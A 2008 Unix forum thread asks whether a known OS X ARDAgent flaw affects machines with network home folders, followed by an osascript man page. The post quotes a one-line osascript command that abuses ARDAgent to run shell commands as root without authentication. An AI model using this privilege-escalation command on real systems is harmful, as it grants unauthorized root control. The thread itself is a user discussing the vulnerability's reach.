Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: ARD Agent vulnerability
Operating Systems OS X (Apple) ARD Agent vulnerability Post 302207304 by afriend on Thursday 19th of June 2008 02:05:31 PM
Old 06-19-2008
ARD Agent vulnerability
today an anonymous slashdot user posted this little shell command, that uses the ARDAgent to gain root access, without ever needing to authenticate.

the script is:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Can be used to things like:
osascript -e 'tell app "ARDAgent" to do shell script "scutil --set ComputerName SomeName"'
that would normally require authentication.

It has been tested by quite a few people, and has been found only to work you are physically at a computer and its logged in.

However where I work we use Network Shares as our home folder, and this hack doesnt seem to work. And I just wanted to make sure that there was no way it would work.

When I run the command:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

I get:
execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)


Anyone thinks its possible?
 

5 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

Solaris agent

Hello, on Solaris 5.8 I've installed SunMgtCenter to get the time agent; it's under /opt/SUNWsymon/sbin/es-start -a it's in ps -ef | grep agent ...but it doesn't work; the machine is always in alarm cause the time is different of the clock server; is it clear enough ? tks cc (0 Replies)
Discussion started by: Carmen123
0 Replies

2. IP Networking

SNMP agent

Hi, I am really new in linux and SNMP. I have a SNMP agent in Linux (net-snmp). I have my MIB in the /usr/share/mibs directory, and I didn't manage to understand where and how do I put the values of the fields in the MIB? The values are static, so the agent need to return the same value in... (0 Replies)
Discussion started by: linuxbegginer
0 Replies

3. UNIX for Dummies Questions & Answers

perform agent

Hi, Please can someone explain me about the " perform agent " on UNIX . Thanx (1 Reply)
Discussion started by: reply2soumya
1 Replies

4. UNIX for Dummies Questions & Answers

vcs agent

Hi all, I'm new to vcs. I have a doubt. I need to know, what will happen if an agent is stopped while reources being online. Eg.. while the oracle agent is stopped, will all the oracle resources will become offline.. Advanced thanks (1 Reply)
Discussion started by: sunshine12
1 Replies

5. Solaris

OV Server on 11 - need to install agent?

Client has got a few machines with logical domains on. But I can't see the the ovs-agent service? Quite possibly I guess this has been set up with just logical domains. With no agent. Do you need to use the agent only if planning to manage with OV Manager? (6 Replies)
Discussion started by: psychocandy
6 Replies

LEARN ABOUT MOJAVE

osascript

OSASCRIPT(1)						    BSD General Commands Manual 					      OSASCRIPT(1)

NAME

     osascript -- execute OSA scripts (AppleScript, JavaScript, etc.)

SYNOPSIS

     osascript [-l language] [-i] [-s flags] [-e statement | programfile] [argument ...]

DESCRIPTION

     osascript executes the given OSA script, which may be plain text or a compiled script (.scpt) created by Script Editor or osacompile(1).  By
     default, osascript treats plain text as AppleScript, but you can change this using the -l option.	To get a list of the OSA languages
     installed on your system, use osalang(1).

     osascript will look for the script in one of the following three places:

     1.   Specified line by line using -e switches on the command line.

     2.   Contained in the file specified by the first filename on the command line.  This file may be plain text or a compiled script.

     3.   Passed in using standard input.  This works only if there are no filename arguments; to pass arguments to a STDIN-read script, you must
	  explicitly specify ``-'' for the script name.

     Any arguments following the script will be passed as a list of strings to the direct parameter of the ``run'' handler.  For example, in
     AppleScript:

	   a.scpt:
	   on run argv
	       return "hello, " & item 1 of argv & "."
	   end run

	   % osascript a.scpt world
	   hello, world.

     The options are as follows:

     -e statement
	   Enter one line of a script.	If -e is given, osascript will not look for a filename in the argument list.  Multiple -e options may be
	   given to build up a multi-line script.  Because most scripts use characters that are special to many shell programs (for example,
	   AppleScript uses single and double quote marks, ``('', ``)'', and ``*''), the statement will have to be correctly quoted and escaped to
	   get it past the shell intact.

     -i    Interactive mode: osascript will prompt for one line at a time, and print the result, if applicable, after each line.  Any script sup-
	   plied as a command argument using -e or programfile will be loaded, but not executed, before starting the interactive prompt.

     -l language
	   Override the language for any plain text files.  Normally, plain text files are compiled as AppleScript.

     -s flags
	   Modify the output style.  The flags argument is a string consisting of any of the modifier characters e, h, o, and s.  Multiple modi-
	   fiers can be concatenated in the same string, and multiple -s options can be specified.  The modifiers come in exclusive pairs; if con-
	   flicting modifiers are specified, the last one takes precedence.  The meanings of the modifier characters are as follows:

	   h  Print values in human-readable form (default).
	   s  Print values in recompilable source form.

	      osascript normally prints its results in human-readable form: strings do not have quotes around them, characters are not escaped,
	      braces for lists and records are omitted, etc.  This is generally more useful, but can introduce ambiguities.  For example, the
	      lists '{"foo", "bar"}' and '{{"foo", {"bar"}}}' would both be displayed as 'foo, bar'.  To see the results in an unambiguous form
	      that could be recompiled into the same value, use the s modifier.

	   e  Print script errors to stderr (default).
	   o  Print script errors to stdout.

	      osascript normally prints script errors to stderr, so downstream clients only see valid results.	When running automated tests, how-
	      ever, using the o modifier lets you distinguish script errors, which you care about matching, from other diagnostic output, which
	      you don't.

SEE ALSO

     osacompile(1), osalang(1), AppleScript Language Guide

HISTORY

     osascript in Mac OS X 10.0 would translate '
' characters in the output to '
' and provided c and r modifiers for the -s option to change
     this.  osascript now always leaves the output alone; pipe through tr(1) if necessary.

     Prior to Mac OS X 10.4, osascript did not allow passing arguments to the script.

Mac OS X							  April 24, 2014							  Mac OS X
All times are GMT -4. The time now is 04:01 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy